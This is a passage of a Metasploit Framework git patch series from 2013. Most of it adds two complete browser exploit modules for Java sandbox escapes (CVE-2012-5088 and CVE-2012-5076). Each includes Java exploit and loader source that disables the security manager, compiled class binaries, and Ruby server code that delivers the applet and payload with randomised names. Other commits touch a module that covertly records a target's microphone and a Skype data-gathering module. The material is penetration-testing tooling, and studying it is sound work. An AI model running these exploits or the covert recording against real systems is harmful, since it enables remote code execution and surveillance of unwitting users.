dead.") + return + end + + data = nil + + begin + t = framework.threads.spawn("prog", false) { progress } + data = client.webcam.record_mic(datastore['DURATION']) + rescue Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + ensure + t.kill + end + + if data + print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)") + p = store_loot( + "#{rhost}.webcam.snapshot", + 'application/octet-stream', + rhost, + data, + "#{rhost}_audio.wav", + "#{rhost} Audio Recording" + ) + + print_good("#{rhost} - Audio recording saved: #{p}") + end + end + +end \ No newline at end of file From ff11cfe6e52a5ba005148bb1b0604072aa84b967 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 12:30:02 -0600 Subject: [PATCH 052/421] Avoid saying "webcam", might be misleading. --- modules/post/multi/manage/record_mic.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 134ad0fbeda2..8121aa07bcba 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -63,7 +63,7 @@ def run if data print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)") p = store_loot( - "#{rhost}.webcam.snapshot", + "#{rhost}.audio", 'application/octet-stream', rhost, data, From 419b32b7427d1bb0b960d34b8172da8aecabb7d0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 12:45:03 -0600 Subject: [PATCH 053/421] Can be used against multiple platforms since it supports java --- modules/post/multi/manage/record_mic.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 8121aa07bcba..73519ea006e4 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -16,11 +16,13 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Multi Manage Record Microphone', 'Description' => %q{ - This module will enable and record your target's microphone. + This module will enable and record your target's microphone. + For non-Windows targets, please use Java meterpreter to be + able to use this feature. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win'], + 'Platform' => [ 'win', 'linux', 'osx' ], 'SessionTypes' => [ 'meterpreter' ] )) From 624ef9a32918a64e78c1b9714a1a4b5c1bb23615 Mon Sep 17 00:00:00 2001 From: Charles Smith Date: Thu, 17 Jan 2013 14:04:52 -0500 Subject: [PATCH 054/421] Fixed a typo in the skype_enum module. "platfom" instead of "platform" fixed. --- modules/post/multi/gather/skype_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index eaad0884e7b3..6b4291f989b4 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -75,7 +75,7 @@ def run process_db(db_in_loot,p['name']) end end - elsif (session.platfom =~ /win/ and session.type =~ /meter/) + elsif (session.platform =~ /win/ and session.type =~ /meter/) # Iterate thru each user profile in a Windows System using Meterpreter Post API grab_user_profiles().each do |p| if check_skype(p['AppData'],p['UserName']) From d0b9808fc7e3185263c4169ef923b697a1fa4d39 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:14:49 +0100 Subject: [PATCH 055/421] Added module for CVE-2012-5088 --- data/exploits/cve-2012-5088/B.class | Bin 0 -> 619 bytes data/exploits/cve-2012-5088/Exploit.class | Bin 0 -> 2342 bytes external/source/exploits/cve-2012-5088/B.java | 19 +++ .../exploits/cve-2012-5088/Exploit.java | 66 +++++++++ .../source/exploits/cve-2012-5088/Makefile | 16 +++ .../multi/browser/java_jre17_method_handle.rb | 130 ++++++++++++++++++ 6 files changed, 231 insertions(+) create mode 100755 data/exploits/cve-2012-5088/B.class create mode 100755 data/exploits/cve-2012-5088/Exploit.class create mode 100755 external/source/exploits/cve-2012-5088/B.java create mode 100755 external/source/exploits/cve-2012-5088/Exploit.java create mode 100755 external/source/exploits/cve-2012-5088/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_method_handle.rb diff --git a/data/exploits/cve-2012-5088/B.class b/data/exploits/cve-2012-5088/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbs{c^P3`kZ}<+!hA^#nvBc1!tpl8RT+J_CgHk_0nBpDNtl-r!#fgg zaNOj$B^(wwQWDa_XR!mfaYq>MO1Q^yUqXgsNy7Ug(6Wpbe87?A_>g0jA#}yGO!q27 zdwg`6Auw;}4TkQtX&JXG#WllO($@-P2?#fa&Wx+)wior1XZAp*IX)sl203F_oSbpf z6#mMMy;8w8-Ncr@qbqn5XBdXWI%(R;xqa7|bsT;FPQ@)%+>GlOdQrj0_=JJaC2|G5 zTvqTYJ|k!aI@T2AkXK+}onu46CQRb!p%rv%BRMY)F!VGm1Zi62xrJ?lT(_OudeKl& zK(WQ`&f1odqqN4$6)Ryo8;PR*z$_GWk99fcm?bx1TCU+(dLc1y(`wIEV8LdXd6gr# z49jqI*T{Pe)3%;BoO&HR=BBk{ZyU))!`-y=3%ZpTwHs{Y(Xzj^U!okgP+~ZJgo_VR zK9#oZ?F#vY>I)@h5fzVyL8a0EN_awOupEpuZHbR;;EFF9IGJ z&QD&b;vZTu-OX8Nqf#_1m%8#ye6($E8)zEC&Hc9iq zQugi*hTbMtJ`%&^iwurTyH@3}W$dQt%IQ{)bc?kJewbN=wAIVryEA!L-!ITRgLo8m z(_-jvsZYIamob7<^koshHZbw7r7=!VBQ!IbgJVy@p3s6CpGNVC0U`(>N|v#@d)pd9 z^Z^0;<|njepQ1h8djda8i(^#;BEc#`T0jj}(WQ|(jxYI#IGsBCbeUX6aWzlxC+c7T(Q5lBA~Lb8YK5#Av6go-;DqVX6c z45ACeP`x%di3BynG&R8t={iqsaF4w6r1CDt@f9ZUEzaV5^7;))Ji{dZz+3nWQ}`Rx zY#8U*G|saHTwq(c$iBb~`x2MfLtLZCSJ>CMPADMkz;g;1 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); + MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); + MethodType localMethodType2 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); + Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); + MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); + MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); + MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); + Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); + MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); + Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); + localClass3.newInstance(); + Payload.main(null); + //Runtime.getRuntime().exec("calc.exe"); + } + catch(Throwable ex) + { + //ex.printStackTrace(); + } + } + +} diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile new file mode 100755 index 000000000000..abc39b7a2c0d --- /dev/null +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -0,0 +1,16 @@ +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0422/ + mv B.class ../../../../data/exploits/cve-2013-0422/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb new file mode 100644 index 000000000000..89fd3db6fb7d --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet Method Handle Remote Code Execution', + 'Description' => %q{ + This module abuses the Method Handle class from a Java Applet to run arbitrary + Java code outside of the sandbox. The vulnerability affects Java version 7u7 and + earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery at security-explorations.com + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5088' ], + [ 'URL', '86352' ], + [ 'BID', '56057' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], + [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 10 2013' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From 78279a03979a268165fe2dffc548235e9e6948d4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:27:47 +0100 Subject: [PATCH 056/421] Added new module for cve-2012-5076 --- data/exploits/cve-2012-5076_2/B.class | Bin 0 -> 619 bytes data/exploits/cve-2012-5076_2/Exploit.class | Bin 0 -> 2780 bytes .../source/exploits/cve-2012-5076_2/B.java | 19 +++ .../exploits/cve-2012-5076_2/Exploit.java | 78 +++++++++++ .../source/exploits/cve-2012-5076_2/Makefile | 18 +++ ...e17_glassfish_averagerangestatisticimpl.rb | 132 ++++++++++++++++++ 6 files changed, 247 insertions(+) create mode 100755 data/exploits/cve-2012-5076_2/B.class create mode 100755 data/exploits/cve-2012-5076_2/Exploit.class create mode 100755 external/source/exploits/cve-2012-5076_2/B.java create mode 100755 external/source/exploits/cve-2012-5076_2/Exploit.java create mode 100755 external/source/exploits/cve-2012-5076_2/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb diff --git a/data/exploits/cve-2012-5076_2/B.class b/data/exploits/cve-2012-5076_2/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbhbA*|GU)~H z7rb9yee#tDpU|~Jmne%@ef1Cc3w-if+-D|jCf2gLvewL*efIU+-`P38|MT-b08isv z5d%;Jq(rnq5fR1tAf6Ku#;}MB7~$ek{um2loQt0iVnV=0zPu!0GKjQ@2&M#F=I@Mv zD*|RjT*V7P%!=qiHi$V9FJeB3YazUZ9N&DI?<@#-C5Tt~@-+dkbNL%VsND6Uh&&1c zGyzKjiVS{RtJ)_S0vXd>sZ|)Hv|(u0cuB2RwJO8$%yo5DO_o%nnAD9`b45!|Yxc5P zm{g5INvj@p?Na37yl&|BFhhHMV4lG@ZWc6#NJclbE4A{XX3eRKC6f5K8bdg1tNE2_ zwc?1KbW#GADK!Q$Yu2p1c2Vd0(!_eDWa@T;Cn6z%BtyTGlx`-+Hf(Lwveb>4nq8^c zS=-XovIHI18HBM!o|hqE1toGVp$tQUiHd|bVKE%!UJ|^tgj-sor8Eh%AOr%X1~QQ* z5)M2PY}6Pg^JY0&tr+f!9@35$7X*rK6b0On@D|=CT$W7h zidxnryn}Zc1}XOh<(?>;H}q0Tb#SicExlqBEN&5rag$c-wt)8}ypInU&h5qOl15Zg zZLQ$ol`++VW(oLE!bkX+Cv#K6C-{`1w^@`&lc76L?X)$IOu}b8=eC70ZvQz$M?qU6 zhBX@U1-=yUm4vVH4MVKyb#B=**IfDu4LUJIoqe@ZDQR|c)Ol?g5wp_9HlG-RMa_0X zkV1UGb0i!gkv~QXvs%@m?P%4dA;Uo2qw2OH)v#`jKpuQlYJtvUd|_-LP46{Jw~74% zeW%m>Ky}#WHrq)(KCm!Gbl5$Db7Z&j3sHV9xfw?O$7aEksB7b`($bbn#KOkOr(}oY zQ&UqOlSXZOkxWhTVgfFC8M5AFT(YM;ZvGS5n`T4Vn`cARIN7@oEr$I~ZnPYuxs3{+ zKV@gcxgVq63|(wI3GM`Ihd;tgB#suG!=7hQAL?)?lsg@IYi`+fhcX3p2jp&3oA~OQ zUDNI5QL9)hYlh8-eSEI~cQ)~xH+ABzZ!ULrf==uXXc$iJtasM}IOLRmgyTgsr)pcZ zylv8~p4sWd6RHIS$H%S_wjt`^G3Is4uBkM7TX?ujm%ZTZt?wO%ww9(UR3lHc>S-Ar z+hmOr+tjM_AD6tUZj@+D5}svMHyHX_I~oc9WsSIsC3GmuK#^XM3!QBjQj55`_V&kR~?6yZn@jf3I$F8wWJaG%Y%xw-j zOR-@bC!{&z77oy}A3+>MCyqeIQTiRDRvo8XB3%)weU~tZ1q`7?(lzSIO={tHWc>q9 z<0qWKJv@Wo@GSly?LU#i-xy{gTwr||VW%+8&SHY4aG9b`vJ1$NU*H^k4=9*lz-a+z p1d1$>7d)WmH)YI~u?T2&nm^8RBAp}qHi|byZ;>kM!8Bzk{|iHH?YIB{ literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2012-5076_2/B.java b/external/source/exploits/cve-2012-5076_2/B.java new file mode 100755 index 000000000000..fec276706019 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/B.java @@ -0,0 +1,19 @@ +import java.security.AccessController; +import java.security.PrivilegedExceptionAction; + +public class B + implements PrivilegedExceptionAction +{ + public B() + { + try + { + AccessController.doPrivileged(this); } catch (Exception e) { + } + } + + public Object run() { + System.setSecurityManager(null); + return new Object(); + } +} diff --git a/external/source/exploits/cve-2012-5076_2/Exploit.java b/external/source/exploits/cve-2012-5076_2/Exploit.java new file mode 100755 index 000000000000..21111fb258b4 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/Exploit.java @@ -0,0 +1,78 @@ +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import metasploit.Payload; +//import java.lang.Runtime; +import java.applet.Applet; +import java.lang.invoke.MethodHandle; +import java.lang.invoke.MethodHandles; +import java.lang.invoke.MethodType; +import java.lang.reflect.Method; +import com.sun.org.glassfish.external.statistics.impl.*; + +public class Exploit extends Applet +{ + public static MethodHandles.Lookup test0; + + public Exploit() + { + } + + + public void init() + { + try + { + + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + byte[] buffer = new byte[8192]; + int length; + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + Class c = Class.forName("java.lang.invoke.MethodHandles"); + Method m = c.getMethod("lookup", new Class[0]); + AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); + MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]); + + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + + // Instance of sun.org.mozilla.javascript.internal.Context + MethodType localMethodType1 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1); + Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]); + + // Context.createClassLoader + MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2); + Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null }); + + // GeneratedClassLoader.defineClass + MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3); + Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer }); + + //New instance of the helper Class + localClass3.newInstance(); + + Payload.main(null); + //Runtime.getRuntime().exec("calc.exe"); + } + catch(Throwable ex) + { + //ex.printStackTrace(); + } + } + +} diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile new file mode 100755 index 000000000000..e93911b8ed42 --- /dev/null +++ b/external/source/exploits/cve-2012-5076_2/Makefile @@ -0,0 +1,18 @@ +# rt.jar must be in the classpath! + +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0422/ + mv B.class ../../../../data/exploits/cve-2013-0422/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb new file mode 100644 index 000000000000..5fabb2f33867 --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -0,0 +1,132 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet JMX Remote Code Execution', + 'Description' => %q{ + This module abuses the AverageRangeStatisticImpl from a Java Applet to run + arbitrary Java code outside of the sandbox, a different exploit vector than the one + exploited in the wild in November of 2012. The vulnerability affects Java version + 7u7 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery at security-explorations + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5076' ], + [ 'OSVDB', '86363' ], + [ 'BID', '56054' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], + [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ], + [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 16 2012' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From 670b4e8e0694b5a08a1a4212f75d6db1cb9a64ed Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:39:41 +0100 Subject: [PATCH 057/421] cleanup --- .../source/exploits/cve-2012-5076_2/Exploit.java | 16 ++++++++-------- ..._jre17_glassfish_averagerangestatisticimpl.rb | 2 +- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/external/source/exploits/cve-2012-5076_2/Exploit.java b/external/source/exploits/cve-2012-5076_2/Exploit.java index 21111fb258b4..78292012fb3a 100755 --- a/external/source/exploits/cve-2012-5076_2/Exploit.java +++ b/external/source/exploits/cve-2012-5076_2/Exploit.java @@ -38,15 +38,15 @@ public void init() // convert it to a simple byte array buffer = bos.toByteArray(); - Class c = Class.forName("java.lang.invoke.MethodHandles"); - Method m = c.getMethod("lookup", new Class[0]); - AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); + Class c = Class.forName("java.lang.invoke.MethodHandles"); + Method m = c.getMethod("lookup", new Class[0]); + AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0); MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]); - - MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); - MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); - Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); - Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); // Instance of sun.org.mozilla.javascript.internal.Context MethodType localMethodType1 = MethodType.methodType(Void.TYPE); diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 5fabb2f33867..72e5c67f3672 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -43,7 +43,7 @@ def initialize( info = {} ) [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', From a43b218917448c8806f5383ca38e8a71f8dd2ea7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 17 Jan 2013 12:43:06 -0800 Subject: [PATCH 058/421] Line full of whitespace --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index da896c3a6b0e..83dde3257ea1 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -60,7 +60,7 @@ def get_xml_rpc_url(ip) vprint_status("#{ip} - Enumerating XML-RPC URI...") begin - + uri = target_uri.path uri << '/' if uri[-1,1] != '/' From ef16a7fd247f5f2129789919374a069dca7a854e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Jan 2013 21:45:13 +0100 Subject: [PATCH 059/421] cleanup --- external/source/exploits/cve-2012-5088/Exploit.java | 10 +++++----- .../exploits/multi/browser/java_jre17_method_handle.rb | 4 ++-- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/external/source/exploits/cve-2012-5088/Exploit.java b/external/source/exploits/cve-2012-5088/Exploit.java index 52045f39537d..4ad3005ad9bf 100755 